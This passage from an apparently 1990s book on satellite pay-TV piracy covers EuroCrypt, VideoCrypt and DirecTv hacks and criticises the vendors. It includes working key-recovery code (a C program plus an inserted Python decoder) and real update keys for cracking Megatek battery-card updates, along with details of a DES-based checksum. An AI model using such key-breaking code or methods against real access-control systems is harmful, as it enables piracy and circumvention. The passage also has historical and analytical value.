     * hash checksum and would look just like any other packet.
     */
    for (i = 0; i < 64; i++)
        kernel_b(msg[31], answ, msg[1]);
    answ[7] &= 0x0f;

    /* test checksum: the 32 bytes of the packet must sum to zero mod 256 */
    b = 0;
    for (i = 0; i < 32; i++)
        b += msg[i];
    if (b != 0) check |= 2;
    return check;
}

The code in use after the ECM was a lot more complex. The Dorchester 
code was certainly the transitional format of the code and the pirates who 
bought it seemed to be guided more by money than experience. 


The ECM was based on Nanocommands. These packets carried sub- 
instructions that used bytes from the address space of the card as inputs to 
the hash function. Other variations allowed the hash function to be executed 
more than 64 times on the last byte. This in itself pushed the PIC16C84 
almost to the limit as the card was relying on the multiplication instruction, 
an instruction that the PIC16C84 did not have. 


It is believed that the DSS code uses a similar nanocommand approach. 
The nanocommands were to prove to be a major asset in the battle against 
the 09 card hackers and pirates. They allowed the implementation of more 
complex ECMs that would not have been possible on previous card issues. 
They also offered News Datacom the potential to implement what would 
cryptographically be a different algorithm every few minutes. This was 
probably a direct reply to the cryptographical weaknesses of the 07 
algorithm. 
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EuroCrypt - Catastrophe By Committee 


At the 1992 Subscription Television Conference in London, I called the 
EuroCrypt-M D2-MAC system “crap”. I actually used that word because it 
looked like some very stupid mistakes had been made in its implementation. 
The system was utterly vulnerable to the McCormac Hack and 
according to all indications, the system was about to be seriously compromised. 


It was a hot Friday afternoon in the middle of the wet English Summer. The 
conference was one of those overpriced self-congratulatory events that pad 
the corporate calendar. Most of the audience were asleep or braindead. It 
was hard to tell from the stage. Even the ensuing debate between Jean 
Pierre Coustel, the head of the France Telecom Visiopasse program, and 
myself failed to wake some audience members. 


Later that year, EuroCrypt-M was hacked. The results have been disastrous 
both for France Telecom and the channels using EuroCrypt-M. At the time 
of writing most of the channels using the system are still hacked. France 
Telecom were spurred into legal action in Germany against Megasat, one of 
the main producers of hacker D2-MAC EuroCrypt-M cards. 


This court action in Germany makes Sky and News Datacom look 
downright clever by comparison. Unfortunately the judge appeared to be 
classically educated and swallowed the France Telecom story about a 
secret key in the card being a trade secret. He allowed a temporary 
injunction against Megasat which stopped them selling hacker EuroCrypt 
cards. 


France Telecom and Canal Plus also took action against Benedex on the 
basis that they were responsible for most of the D2-MAC piracy. The action 
effectively put Benedex out of action. The piracy on D2-MAC continued, 
proving that France Telecom and Canal Plus were about four years too late 
to stop piracy on EuroCrypt. 


With Benedex out of the way, FilmNet and TV1000 implemented key 
changes. The update has been referred to by some hackers as the “Natural 
Born Idiots” upgrade. The movie “Natural Born Killers” was to be shown on 
FilmNet and TV1000. The upgrade, according to theory, would prevent the 
pirate viewers from seeing the movie. Of course the new keys were 
released within a few hours. It made FilmNet and TV1000 look like idiots, 
hence the name of the upgrade. 


The only thing that the Natural Born Idiots upgrade succeeded in doing was 
swelling the coffers of the pirates. It seemed like TV1000 was trying to exact 
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some revenge after all the years that it has been hacked. It is moving to a 
new satellite as of August first. In the end they couldn’t even do things 
properly. And FilmNet? Well, they just went along for the ride. 


The Algorithm 


In EuroCrypt, the critical element is the key rather than the algorithm. The 
algorithm is that old favourite, the Data Encryption Standard algorithm. It 
has of course been modified to run faster in the software implementation in 
which it is used. The initial and inverse initial permutations are removed for 
the EuroCrypt-M implementation. 


A comment made at the 1992 Subscription Television Conference that 
EuroCrypt used the same algorithms as the banks gave the game away. 
From then on it was a simple case of narrowing down the options. The 
banks use RSA and DES. 


Of the two algorithms, DES was the more likely. The EuroCrypt-M smart 
card does not have the computing power to safely handle RSA as part of the 
control word generation. Therefore the algorithm used had to be DES or a 
variant. 


The problem with DES is that it is heavily geared towards a hardware 
implementation. It can be difficult to implement in software even in a 
microcontroller. The EuroCrypt smart card is modeled on the 6805 
microcontroller and runs at 3.5 MHz. Any modifications to the published 
algorithms would have the desired aim of speeding up the decryption 
process without weakening the security. 


The most obvious modification was the elimination of the Initial and inverse 
Initial Permutations (IP and IP^-1). A public domain computer program, 
NET_DES.ARC, pointed out that these permutations appeared to slow 
down the process when it was implemented in software. It allowed an 
implementation in software without these permutations. Even with these 
permutations removed from the implementation, the DES is still a good 
algorithm for use in a scrambling system. The only proviso is that the key 
handling protocol must be good. 


There has been a lot of debate over why France Telecom chose the DES 
algorithm. Some see it as an example of bureaucratic bumbling. Others see 
it as a quick solution that saved them some hard cryptographical research. 
More still consider that it was a good choice considering that it was one of 
the better public domain algorithms at the time. The real answer is only 
known unto France Telecom. Of course the current speculation is that it 
was a combination of all three. 
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The implementation of DES in the EuroCrypt-M is the Electronic Code Book 
mode with the initial and inverse initial permutations removed to make it run 
faster. The seed transmitted over the air is ENCRYPTED using the 
algorithm to produce the result. 


The implementation of DES in the EuroCrypt-S2 is also the Electronic Code 
Book mode. In this case, the seed is DECRYPTED using the algorithm. The 
initial and inverse initial permutations are also used. 


A EuroCrypt Phoenix? 


The one thing that has saved the D2-MAC EuroCrypt-M system from a 
widespread Phoenix type attack is the fact that it is easier to implement the 
critical algorithm. However Phoenix programs for testing the EuroCrypt 
cards have been developed. These programs have not been distributed 
because there is no real need for them. The other aspect is that the key 
handling procedures in EuroCrypt are different to those used in VideoCrypt. 


In the EuroCrypt specification, the critical elements are the keys. The theory 
is that the algorithm is too difficult to reverse. A couple of years ago this 
would have been true but the algorithm can be reversed using DES cracking 
engines. However such engines are far outside the budget of most 
EuroCrypt pirates and hackers. 


Had the key handling theories of the designers of EuroCrypt been 
implemented, then the EuroCrypt system would definitely have been a 
harder system to hack than it was. However the fact that the majority of 
cards in operation on the channels using EuroCrypt are EPROM meant that 
frequent key updates were not feasible. 


The best example of EuroCrypt being used according to specification is 
Cine Cinemas. The keys are updated regularly. However the problem is that 
the relevant management key is known by the hackers and pirates. Now if 
the management key that is used to encrypt the key updates is not known, 
any hack would have a very limited lifetime indeed. Of course central to all 
this is the checksumming routine used on the system. 


While key updates on FilmNet, TV1000 and the TV3s have been sporadic, 
other channels seem to be taking a more active approach. It is believed that 
the Rendezvous channel, a hardcore French porn channel, changes their 
key every few days. Rumblings of a new key change policy have been 
detected in some of the Scandinavian channels as well. 


A new key update schedule seems to be a possibility for FilmNet and 
TV1000. The theory is that they will revert to a monthly key schedule. The 
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new keys will be downloaded during the last week of one month and the first 
week of the next. This kind of key update schedule is similar to that used on 
the VideoCipher II system in the USA during the mid eighties. It is of course 
a more radical approach than FilmNet or TV1000 have used before. There 
is one flaw in the approach. If the management keys used to update the 
keys are known then the hackers and pirates can also update their cards. A 
two week or even a one week key update period is not sufficient to cause 
problems for commercial pirates. The battery cards are especially immune 
to this relatively long update period. It remains to be seen if this will actually 
happen or perhaps it was just that someone turned the air-conditioning off in 
one of the FilmNet or TV1000 counter-piracy offices and their brains 
overheated producing, for once, a promising idea. 


Without a knowledge of the EuroCrypt checksumming routine, the 
EuroCrypt Phoenix experiments could not have worked. Most of the better 
commercial pirate card implementations had this checksumming routine 
incorporated. It would have been an easy ECM to include some packets 
with bad checksums. The pirate cards without this checksumming routine 
would have accepted these packets and thus the decoder would not decode 
properly. 

The checksumming in EuroCrypt is also based on the DES algorithm. It 
takes the bytes of the CA88 message and uses them as the input to the 
algorithm to produce a result that should be equal to the checksum in the 
packet. The bytes are EXORed with an eight byte buffer, eight at a time. 
Then the buffer is processed. On the last application of the algorithm, the 
remaining bytes are EXORed with the buffer and the buffer is processed 
even though there were not eight bytes remaining. The algorithm used for 
the checksumming routine is modified slightly so that the ordering of the 
results of the S Box selection is different. The results from S1,S2 are 
swapped with the results from S5,S6. 


The ease with which the EuroCrypt Phoenix was constructed was due in no 
small part to the availability of information on the packet structures. It was 
possible to activate and deactivate cards. It was also possible to upgrade 
keys. 


Though the concept of a EuroCrypt Phoenix may seem strange, it should be 
remembered that there is talk of a PPV service being introduced using the 
EuroCrypt system. In the event of such a service, this kind of program 
would prove to be a major threat assuming the keys and possibly the new 
hash function are known. 
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Megatek Update Codes Hack 


The whole principle of the Megatek, Cardtronix and Benedex battery cards 
is that they allow for a secured update. To date this update channel has 
been via telephone line or via internet. The more advanced models are to 
have modem update but the whole system depends on a secure method of 
update. Otherwise everyone would be able to get the updates at the same 
time. From a commercial viewpoint, this would not be good. The update 
procedure of the Megatek card has of course been changed to a more 
secure format. 


The update of the FilmNet and TV1000 keys in the Autumn of 1995 
provided some material for a challenge. Unfortunately the two encrypted 
keys are not enough to derive a full encryption algorithm as used by the 
Dallas 5002FP for the addressing and data. But that was not the objective. 
The weakness was in the algorithm that Megatek used in the card. It was 
relatively trivial to break. (Actually I could not find a crossword puzzle.) 


The updates for the Megatek cards are supplied in an alphabetic format. 
Each block is three letters wide. As a result, these three letters represent an 
octal code: 

    a = 0    e = 4 
    b = 1    f = 5 
    c = 2    g = 6 
    d = 3    h = 7 

The three letter blocks break down as follows: 

    L1 * (8^2) + L2 * (8^1) + L3 * (8^0) 

To translate from the three letter blocks to hexadecimal is therefore 
straightforward. 


FilmNet: 

    Alpha-Octal          Octal             Hexadecimal 
    BEG AGF ACD BCH      146 165 125 127   66 75 53 57 
    BEG DAC DCH DHG      146 302 327 376   66 C2 D7 FE 
    BEG BEF DEB CAA      146 145 341 200   66 65 E1 80 
    BEG AGG DDB CCD      146 066 331 223   66 36 D9 93 
    BEG AGD AEC BAE      146 063 042 104   66 33 22 44 
    BEG AAF DBG DDD      146 005 316 333   66 05 CE DB 
    BEG CBD DFG DAC      146 213 356 302   66 8B EE C2 

TV1000: 

    Alpha-Octal          Octal             Hexadecimal 
    BEG BDD BGD CHF      146 133 163 275   66 5B 73 BD 
    BEG BGA ABC CFB      146 160 012 251   66 70 0A A9 
    BEG BCD DAF DCC      146 123 305 322   66 53 C5 D2 
    BEG BHC DGH CDH      146 172 367 237   66 7A F7 9F 
    BEG CAH CHF CFE      146 207 275 254   66 87 BD AC 
    BEG DHF CAB AFC      146 375 201 052   66 FD 81 2A 
    BEG ADH ADH DGE      146 037 037 364   66 1F 1F F4 

The format of the instruction appears to be WRITE ADDRESS DATA. The 
66h value is the write instruction, the following two bytes may be the 
address in encrypted format and the last byte is the key. The encrypted keys 
for FilmNet and TV1000 are shown below: 

Ke FilmNet: 
    57 FE 80 93 44 DB C2 

Ke TV1000: 
    BD A9 D2 9F AC 2A F4 

Since the plaintext keys are also now available it is possible to compare 
them. A simple EXOR shows interesting characteristics. 

Kp FilmNet: 
    F2 58 27 33 E5 79 61 

Kp TV1000: 
    90 87 FD B7 85 00 DF 

FilmNet Ke EXOR Kp: 
    Ke   57 FE 80 93 44 DB C2 
    Kp   F2 58 27 33 E5 79 61 
         --------------------- 
         A5 A6 A7 A0 A1 A2 A3 

TV1000 Ke EXOR Kp: 
    Ke   BD A9 D2 9F AC 2A F4 
    Kp   90 87 FD B7 85 00 DF 
         --------------------- 
         2D 2E 2F 28 29 2A 2B 


The sequence obtained when the plaintext key is EXORed with the 
ciphertext key is unusual. The high nybble is a static value but the lower 
nybble increases by one per byte. The sequence of the low nybble resets at 
byte 03: essentially, 7 is subtracted from the value of the previous low 
nybble to give the new starting value. The reason for this becomes clear 
when the numbers from 0 to F are listed in binary. The column marked 
with the asterisk (*) has the same characteristic. 

        *              * 
    0   0000       9   1001 
    1   0001       A   1010 
    2   0010       B   1011 
    3   0011       C   1100 
    4   0100       D   1101 
    5   0101       E   1110 
    6   0110       F   1111 
    7   0111 
    8   1000 


At first, it looked like the static nybble could be obtained by EXORing the 
high nybbles of the first and second bytes of the encrypted keys. This 
worked perfectly for the FilmNet pair but was not successful for the TV1000 
pair. 

    FilmNet:           TV1000: 
    5 EXOR F = A       B EXOR A = 1 

One possible reason is that the values to be EXORed are both greater than 
9. Therefore in that case, one has to be added to the result of this EXOR. 


Outline Of Algorithm: 

1. The high nybble is always static and the low nybble is sequential. It was 
pointed out that talking of the high nybble as being static may be incorrect, 
as five of the high bits are always static. The static data may indicate 
that it is some form of counter or register that is EXORed. One candidate is 
the address register. 

    (sNh) = B1(Nh) EXOR B2(Nh)   (if B1(Nh) and B2(Nh) are both greater than 9, add 1) 

2. The sequence of the low nybble is broken at byte 03. The new starting 
value created for this nybble is equal to the previous nybble value minus 
seven. 
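The decoding and the EXOR comparison above, carried through as an added example that is not the book's code: it parses the alpha-octal update lines into WRITE ADDRESS DATA, recovers Ke from the data bytes, and checks the counter-like shape of Ke EXOR Kp that makes the scheme a known-plaintext break. Function names are my own; the inputs are the tables and keys quoted in the text.

```python
# Added example, not from the book: a decoder for the Megatek alpha-octal
# update format and a check of the Ke EXOR Kp pattern the text reports.
# Function names are my own; the inputs are copied from the tables above.

FILMNET_UPDATES = [                      # FilmNet table, alpha-octal column
    "BEG AGF ACD BCH", "BEG DAC DCH DHG", "BEG BEF DEB CAA",
    "BEG AGG DDB CCD", "BEG AGD AEC BAE", "BEG AAF DBG DDD",
    "BEG CBD DFG DAC",
]
TV1000_UPDATES = [                       # TV1000 table, alpha-octal column
    "BEG BDD BGD CHF", "BEG BGA ABC CFB", "BEG BCD DAF DCC",
    "BEG BHC DGH CDH", "BEG CAH CHF CFE", "BEG DHF CAB AFC",
    "BEG ADH ADH DGE",
]
FILMNET_KP = bytes.fromhex("F2582733E57961")   # plaintext keys from the text
TV1000_KP = bytes.fromhex("9087FDB78500DF")

WRITE_OPCODE = 0x66                             # the 66h write instruction
LETTER_VALUE = {ch: i for i, ch in enumerate("ABCDEFGH")}   # a=0 ... h=7


def alpha_octal_block(block):
    """Three letters a..h -> L1*8^2 + L2*8^1 + L3*8^0, as one byte."""
    block = block.upper()
    if len(block) != 3 or any(ch not in LETTER_VALUE for ch in block):
        raise ValueError("bad alpha-octal block %r" % block)
    value = 0
    for ch in block:
        value = value * 8 + LETTER_VALUE[ch]
    if value > 0xFF:                 # 'EAA' = 0o400 does not fit one byte
        raise ValueError("block %r exceeds one byte" % block)
    return value


def decode_update_line(line):
    """'BEG DAC DCH DHG' -> bytes 66 C2 D7 FE."""
    return bytes(alpha_octal_block(b) for b in line.split())


def parse_write_instruction(line):
    """Split one decoded line into its WRITE ADDRESS DATA fields."""
    raw = decode_update_line(line)
    if len(raw) != 4 or raw[0] != WRITE_OPCODE:
        raise ValueError("not a 4-byte write instruction: %r" % line)
    return {"opcode": raw[0], "address": raw[1:3], "data": raw[3]}


def encrypted_key(lines):
    """The data byte of each write, in order, is the encrypted key Ke."""
    return bytes(parse_write_instruction(line)["data"] for line in lines)


def xor_mask(ke, kp):
    """Byte-wise Ke EXOR Kp: the 'keystream' the update scheme applied."""
    return bytes(a ^ b for a, b in zip(ke, kp))


def mask_is_counter_like(mask):
    """True when the mask has a single static high nybble and a low nybble
    that steps +1 per byte, restarting seven lower at byte 03."""
    highs = {b >> 4 for b in mask}
    lows = [b & 0xF for b in mask]
    x = lows[0]
    expected = [x]
    for i in range(1, len(lows)):
        x = (x - 7) & 0xF if i == 3 else (x + 1) & 0xF
        expected.append(x)
    return len(highs) == 1 and lows == expected


def static_nybble_guess(ke):
    """The outline's rule for the static high nybble: EXOR the high nybbles
    of the first two encrypted bytes, adding one when both exceed 9."""
    h1, h2 = ke[0] >> 4, ke[1] >> 4
    h = h1 ^ h2
    if h1 > 9 and h2 > 9:
        h += 1
    return h & 0xF


def analyse(lines, kp):
    """Tie the steps together for one channel's update set."""
    ke = encrypted_key(lines)
    mask = xor_mask(ke, kp)
    return {"ke": ke.hex().upper(), "mask": mask.hex().upper(),
            "counter_like": mask_is_counter_like(mask),
            "static_nybble": static_nybble_guess(ke)}


if __name__ == "__main__":
    for name, lines, kp in (("FilmNet", FILMNET_UPDATES, FILMNET_KP),
                            ("TV1000", TV1000_UPDATES, TV1000_KP)):
        print(name, analyse(lines, kp))
```

Because the whole mask is fixed by one static nybble and one start nybble, the seven-byte key has only 256 candidates once the shape is known, which is the reduction the experimental code below exploits.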


McAttack Experimental Code 

-------- cut here -------- 

#include <stdio.h>
/* #include <dos.h>   only needed by the commented-out DOS timing code */

/* MCATTACK.C

This program crunches the encryption on the Megatek battery
card updates and generates 256 possible DES keys for any DES
update. The reduction from 2^56 to 2^8 means that all the
possible keys can be tested in less than a second.

Change the values in the ekey and lkey arrays to the high
and low nybbles of the encrypted key bytes. This is an
experimental piece of code so it is not as elegant as it
could be.

Last Rev: 19951020

FilmNet key:
plaintext:  F2 58 27 33 E5 79 61
ciphertext: 57 FE 80 93 44 DB C2

TV1000 key:
plaintext:  90 87 FD B7 85 00 DF
ciphertext: BD A9 D2 9F AC 2A F4
*/
/*
unsigned char ekey[7] = { 0xb, 0xa, 0xa, 0x9, 0xa, 0x2, 0xf };
unsigned char lkey[7] = { 0xd, 0x9, 0x2, 0xf, 0xc, 0xa, 0x4 };
unsigned char ekey[7] = { 0x3, 0xc, 0x6, 0x3, 0x3, 0x0, 0x8 };
unsigned char lkey[7] = { 0x5, 0x2, 0x5, 0x6, 0x3, 0x5, 0xb };
*/
unsigned char ekey[7] = { 0x5, 0xf, 0x8, 0x9, 0x4, 0xd, 0xc };  /* high nybbles */
unsigned char lkey[7] = { 0x7, 0xe, 0x0, 0x3, 0x4, 0xb, 0x2 };  /* low nybbles */
/*
filmnet col2
unsigned char ekey[7] = { 0x7, 0xc, 0x6, 0x3, 0x3, 0x0, 0x8 };
unsigned char lkey[7] = { 0x5, 0x2, 0x5, 0x6, 0x3, 0x5, 0xb };
unsigned char ekey[7] = { 0x5, 0x7, 0x5, 0x7, 0x8, 0xf, 0x1 };
unsigned char lkey[7] = { 0xb, 0x0, 0x3, 0xa, 0x7, 0xa, 0xf };
*/
unsigned char l, c, e, h, ok, x, y, z;
/* The global array fill option is used to fill the arrays */
unsigned char dkey[7] = {0};
unsigned char Harray[16][7] = {0};   /* one row per guess of the static high nybble */
unsigned char Larray[16][7] = {0};   /* one row per start value of the low nybble */
unsigned char Parr0[16][7] = {0};
unsigned char Parr1[16][7] = {0};

int main(void)
{
    /* This is the timing routine that was irrelevant
    struct time t;
    gettime(&t);
    printf("The start time is: %2d:%02d:%02d.%02d\n",
           t.ti_hour, t.ti_min, t.ti_sec, t.ti_hund);
    */

    /* Fill High Array: each guess c of the static nybble EXORed with
       the high nybble of every encrypted byte */
    for (c = 0; c <= 0xf; c++) {
        for (e = 0; e <= 6; e++) {
            ok = c ^ ekey[e];
            ok = ok << 4;
            Harray[c][e] = ok;
        }
    }

    /* This section here could be done using a for loop but since
       checking the result at each stage was important I used a
       more basic approach. The low nybble counts up by one per byte
       and restarts seven lower at byte 3; arithmetic is modulo 16. */
    for (c = 0; c <= 0xf; c++) {
        x = c;
        l = x ^ lkey[0]; Larray[c][0] = l;
        x = (x + 1) & 0x0f;
        l = x ^ lkey[1]; Larray[c][1] = l;
        x = (x + 1) & 0x0f;
        l = x ^ lkey[2]; Larray[c][2] = l;
        x = (x - 7) & 0x0f;                 /* sequence resets at byte 3 */
        l = x ^ lkey[3]; Larray[c][3] = l;
        x = (x + 1) & 0x0f;
        l = x ^ lkey[4]; Larray[c][4] = l;
        x = (x + 1) & 0x0f;
        l = x ^ lkey[5]; Larray[c][5] = l;
        x = (x + 1) & 0x0f;
        l = x ^ lkey[6]; Larray[c][6] = l;
    }

    printf("High Array         Low Array\n");
    for (x = 0; x <= 0xf; x++) {
        printf("\n");
        for (y = 0; y < 7; y++) printf("%X ", Harray[x][y] >> 4);
        printf("     ");
        for (z = 0; z < 7; z++) printf("%X ", Larray[x][z]);
    }

    /* Combine every high nybble guess with the two low nybble start
       groups (0x5 and 0xd) seen in the known key pairs */
    for (x = 0; x <= 0xf; x++) {
        for (y = 0; y < 7; y++) {
            Parr0[x][y] = Harray[x][y] | Larray[5][y];
            Parr1[x][y] = Harray[x][y] | Larray[0xd][y];
        }
    }

    printf("\n*************************************************\n");
    printf(" (0x5 Group)   Possible Key Arrays   (0xd Group)");
    printf("\n-------------------------------------------------\n");
    printf(" Encrypted Key: ");
    for (x = 0; x < 7; x++) {
        dkey[x] = (ekey[x] << 4) | lkey[x];
        printf("%2.2X ", dkey[x]);
    }

    /* Static high nybble: EXOR of the first two encrypted high nybbles,
       plus one when the first is greater than the second (the outline
       above describes the carry as both nybbles being greater than 9) */
    h = ((ekey[0] << 4) ^ (ekey[1] << 4)) >> 4;
    if (ekey[0] > ekey[1]) h = h + 1;

    printf("\n Potential keys on row %2.2x ", h);
    printf("\n*************************************************\n");

    /* for (x = 0; x <= 0xf; x++) { printf("%2.2x | ", x); */
    x = h;
    for (y = 0; y < 7; y++) printf("%2.2X ", Parr0[x][y]);
    printf("   ");
    for (z = 0; z < 7; z++) printf("%2.2X ", Parr1[x][z]);
    printf("\n");
    /* } */
    return 0;
}   /* Now Wasn't That Fun :-) */
The C source code given here is the experimental code that was used to test 
the ideas. I had included a timing loop to read the start and end times of the 
program execution. At first I thought there was an error in that element of 
code. The program was executing and the clock was not being updated. It 
turned out that the time taken to calculate the keys, even with the full key 
table values, was too fast for the PC to read. Megatek changed their key 
update method. The Cardtronics update method is also different. 


It was sheer chance that this weakness was stumbled upon. But one thing is 
apparent here - it is very important for a cryptanalyst or hacker to be lucky. 
Of course a modicum of insanity also helps. The Dallas 5002FP is one of the 
most difficult chips in the world to hack. It was for this reason that Megatek 
used it. But in the midst of all this security, there was one small oversight 
that allowed the key update to be hacked. I guess they thought nobody 
would be crazy enough to try. 


The update procedure on other battery cards seems to be more secure than 
this one. According to one source, the IDEA algorithm was used to encrypt 
the update codes for one of the cards. 


The interesting thing here is that the battery card update procedure was 
cracked using a known plaintext attack. This was really only possible on 
D2-MAC EuroCrypt keys. This is because the keys were used in their raw 
format in the Megatek card. Thus there was no second level of encryption 
beneath the update encryption. Had there been a second level of encryption, 
this simple attack would not have worked. 


Naturally with all the ECM codes for the Sky 09 available, this looked like a 
promising approach for trying to attack the address and data encryption on 
the Dallas 5002FP itself. The objective of this hack was only to crack the 
update keys. The elements that led to the hack were the regularity of the 
update code format, the simplicity of the encryption algorithm and the 
availability of some plaintext. It is not likely that this combination will be 
repeated. 
The title of the chapter is “Video Manipulative Systems”. A VMS is a system 
that digitises and scrambles the video. The key word is digitise. A digital 
system theoretically offers more security but in practice the system can be 
hacked because of flaws in the other areas of the system. The old argument 
that digital systems will spell the end of piracy is not valid. Indeed all of the 
hacks covered here deal with systems that were, at one time, supposed to 
be pirateproof or hackerproof. They were not. No system protecting 
valuable programming is ever secure for long. 


Many of the systems covered in this chapter are perhaps best described as 
transitional systems. While they are firmly based on analogue television 
standards, they use digital encryption methods to achieve their security. 
Most of the encryption is aimed at protecting the datastream that allows the 
video to be decoded by an authorised card or decoder. 


While the access control area of these transitional systems is strictly 
digital and uses hard encryption, the video is still only scrambled, albeit by 
digital techniques. 


The differentiation here between the words “encryption” and “scrambling” is 
subtle. The video scrambling is not strictly encryption as such. It does not 
alter the value of the video. It merely transposes the video in the time 
domain. The simplest way of thinking of this kind of scrambling, whether cut 
and rotate or line shuffle, is as a transposition cipher that just alters the 
position of the letters in a message. This transposition cipher does not alter 
the actual letters. 


Of course considering the Video Manipulative Scrambling system as a 
transposition cipher is a drastic simplification. It takes a lot of electronics to 
produce this transposition. This is also the reason that these systems are a 
lot more difficult to hack than systems that are primarily based on 
manipulating the synch pulses. 


The Multiplexed Analogue Component, MAC, system with its many variants 
is somewhere in the wilderness between the transitional systems and the 
real digital television systems. It too uses digital scrambling techniques to 
alter the position of the video. It also compresses the video packets and 
uses digital audio. However it too is primarily a glorified scrambling system 
as opposed to a fully fledged digital system. 


The one exception to the systems above is the DirecTv system. This 
system is effectively a digital television system. It uses MPEG 1.5 and digital 
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techniques to encrypt the data and transmit that data. It was effectively the 
first real digital television system to be hacked. 


The DirecTv system was hacked because some people, who should have 
known better, fell for the same line of disinformation that had worked so well 
for News Datacom here in Europe. They actually were convinced that the 
DirecTv system was unhackable - right up until the first pirate cards 
appeared. Even then they did not seem to believe it. 


The hypothesis of considering a hack as a virus or a disease, as outlined in 
Chapter 1, has a particular relevance here when discussing the DirecTv 
system. The official smart card used for the 09 Sky card, the VideoCrypt-2 
card and the DirecTv card is the same. Only the program in the EEPROM 
seems to be different. Therefore since the hackers were familiar with 
hacking the 09, the same information was applied in hacking each of the 
subsequent systems. Economy of scale also works against a system 
manufacturer, or as an old pirate expression would put it: “swing one, swing 
all say I.” 


It is such an event, where a common element is hacked, that demonstrates 
just how stupid the arguments for a single scrambling system or standard 
are, and how ignorant the proponents of such a system or standard are of 
piracy. 


Most of the systems in use here are at least five years old and as such they 
now seem to be from a different era when some people still believed in such 
things as unhackable smart cards. Today, only fools believe that a system is 
unhackable. 


The systems on the market in Europe have been hacked. The majority of 
the hacks have been on the access control section of the systems. However 
the hack on the Nagra system was based on attacking the video 
scrambling. The problem with the Nagra system for hackers was that there 
were not enough decoders in free circulation to make a pirate smart card a 
valid business proposition so the only viable alternative was to make a 
pirate decoder that hacked the system from the video scrambling aspect. 
This alternative hack was not possible, technically and economically until 
the last year or so. 


With the other systems, the hackers refused to attack what arguably was 
the strongest point of each system. It was almost as if the thought mode of 
the system designers was frozen in the attrition warfare style of World War 
One. The hackers meanwhile use a more fluid approach more akin to 21st 
century guerrilla warfare. 
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The main element in the rise of video manipulative systems has been the 
low cost of video Analogue to Digital Converters, ADCs, and video Digital to 
Analogue Converters, DACs. This has of course created problems for some 
of the older VMS such as B-MAC. It has become possible for a hacker to 
build an economically feasible pirate video only decoder. The weakness that 
allowed the hack to succeed was the actual standard transitions in the 
waveform. 


The whole idea of an access control system based only on smart cards is 
now seen in a very jaundiced light. The attitude that smart cards are the 
panacea for piracy evaporated with the hacks on the VideoCrypt, 
EuroCrypt and DirecTv smart card systems. 


When the hacks occur, the companies providing the access control act with 
alarming detachment or they do lunch meetings. Most of them are perhaps 
used to dealing with bankers. In banking, the admission that a system is 
hacked is tantamount to suicide. This attitude apparently infected these 
access control companies. The result on the channels using these systems 
was devastating and in some cases legal action against these companies 
for incompetence is probably justified. 


The main problem appeared to be that the access control system provider 
had a “Screw You” agreement with the channels. It was irrelevant whether 
the system security remained intact, they got their money either way. Of 
course if the recent court action in the UK High Court is anything to go by, 
News Datacom were also being screwed by their own people, allegedly. 
Apparently they are taking an action against 11 defendants associated with 
News Datacom for allegedly conspiring to artificially inflate the price of 
smart cards that News Datacom had to pay. The action is for some £19 
million in damages. Hackers and pirates all over the planet fell 
around laughing when they heard about this. The irony of this was News 
Datacom chasing after pirates while they allegedly had such a 
massive problem like this on the inside. 


DirecTv in the USA has also been hit by piracy. This is not surprising 
considering that their card was a development of the VideoCrypt card used 
here in Europe. However the path of the hacks in DirecTv is slightly different 
to those of the hacks on VideoCrypt. 


During the launch of the DirecTv system in 1994, an article in an edition of 
the American publication, “Satellite Retailer”, brought to mind Hemingway’s 
quotation about the most essential piece of equipment for a journalist. 
The article claimed that there had been “no reports of a pirated VideoCrypt 
since its entrance into the market in 1989”. Yeah right! Now this statement 
was made roughly one year after the Ho Lee Fook hack on VideoCrypt had 
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started operating and at the height of the piracy on Sky's 07 card. To a 
European, this statement was tantamount to a lie. VideoCrypt had been 
utterly and totally hacked for a year in Europe. This major fact had been 
neatly ignored. The sole aim of the article was to make the DirecTv system 
and News Datacom look good. 


The article was typical of the ignorant and inane claims made in Europe by 
News Datacom's marketing brochures. It looked like they were trying to pull 
the same "minimal information" operation on the press in the USA. When 
VideoCrypt was launched in Europe the praise in the satellite press was 
worse than a Mexico city wind storm. 


Recent events in North America have shown that News Datacom and their 
client DirecTv seem to be adopting the same tack. They announced that they 
have filed a civil suit against 22 named defendants who allegedly engaged 
in all sorts of terrible plots to hack and pirate the very secure DirecTv 
VideoGuard system. 


If it was so secure, as the gullible individuals in DirecTv stated, then why 
was it hacked? The quotes surrounding the launch made it look like the 
hack could never have happened. I guess you could call it the “Security By 
Publicity” strategy. 


Two facts have emerged from this mess. The first fact is that a renewable 
security element does not confer some sort of immunity to hacking upon the 
system. The second fact is that some people will believe absolutely 
anything. 


The raids on battery card users and dealers in the USA and Canada have, 
far from curing the piracy problem, drawn the next generations of hacks on 
smart card based systems closer. These hacks will be modified SEASON 
type hacks with security elements to prevent the end user from redistribut- 
ing them. They will be delivered via internet and BBSes from outside the 
jurisdiction. 

The pirate Sky 10 Battery Cards have actually gone through their first 
ECMs. The ECM was effective on all Battery Cards. However the hackers 
and pirates had a solution. It does involve sending the card back to the 
manufacturer. This could indicate that the pirate DSS card option may be 
the way things will go with pirate cards in the future. Alternatively, the 
FireLyte™ method of updating the cards could be used. 
System: VideoCrypt-1 


The VideoCrypt system was a good low cost attempt at a secure scrambling 
system. It was based on the premise that the smart card provided hackers 
with a moving target rather than a sitting one. When the smart card was 
hacked, the theory was that it could be replaced. 


This theory did not work very well. By April 1993 the smart card for the Sky 
channels was totally compromised. It was not until Dark Wednesday, May 
18th 1994, that the Sky smart card had been properly replaced. 


By June of 1994, a hacker version of the 09 Sky code was on auction. It was 
October 1994 before the first stable 09 pirate cards entered the market. 
From then on it was a downward spiral for the 09 card. The hackers and 
pirates had until 31st October 1995 before Sky changed to their new card, 
the 10. 


The 10 card was hacked as well. The first indications of this occurred on the 
Friday before Easter Sunday 1996. This is referred to as “Good Friday” in 
Ireland. For the pirates and hackers it certainly was. It marked the triumph 
of pirate technology over that of Sky. It was also fulfilling a pattern 
established over the last few years. 


The pattern is the hack pattern for the Sky smart card. The pattern is that a 
stable pirate card generally appears six months or so after the introduction 
of the new official card and the pirates generally have some 11 months of 
money making activities from each hack. 


Though it was readily apparent from the start of the Ho Lee Fook hack that 
the VideoCrypt smart card system had been totally compromised, News 
Datacom and Sky acted strangely. Their claims of a replaceable smart card 
became just so much hot air. They lumbered from one crisis to another. 
Their electronic countermeasures were defeated with startling rapidity. It 
was apparent to everyone in the Blackbox industry that their system was 
totally hacked. Yet they persisted in their ivory tower views and tried to 
pursue pirates through the courts. 


The legal action was the last straw - these people were not playing with a 
full deck. They could not protect their own system using technological 
